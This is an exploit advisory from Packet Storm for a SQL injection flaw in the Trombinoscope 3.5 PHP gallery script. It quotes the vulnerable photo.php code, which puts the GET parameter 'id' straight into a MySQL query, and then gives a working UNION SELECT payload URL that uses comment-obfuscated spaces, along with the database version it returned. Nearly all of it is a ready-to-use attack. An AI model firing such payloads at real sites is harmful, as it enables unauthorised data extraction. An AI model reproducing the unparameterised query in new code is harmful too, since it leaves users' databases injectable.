Trombinoscope 3.5 SQL Injection

2012-05-06T00:00:00
ID PACKETSTORM:112488
Type packetstorm
Reporter Ramdan Yantu
Modified 2012-05-06T00:00:00

Description

                                        
                                            `<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~>  
Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability  
Date: 03 Mei 2012  
Author: Ramdan Yantu  
Home: http://ramdanyantu.com/  
Software Link:  
http://ftp1.toocharger.com/sc2MP3p/trombinoscope_4116.zip  
<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~>  
  
Bugs <photo.php>:  
  
[...]  
25 <?php  
26 $id = $_GET["id"];  
27  
28 $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id";  
29 $seul = mysql_query($query_seul) or die(mysql_error());  
30 $row_seul = mysql_fetch_assoc($seul);  
31  
32 ?>  
[...]  
  
Exploit: http://localhost/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--  
Result : 5.0.51b-community-nt-log  
`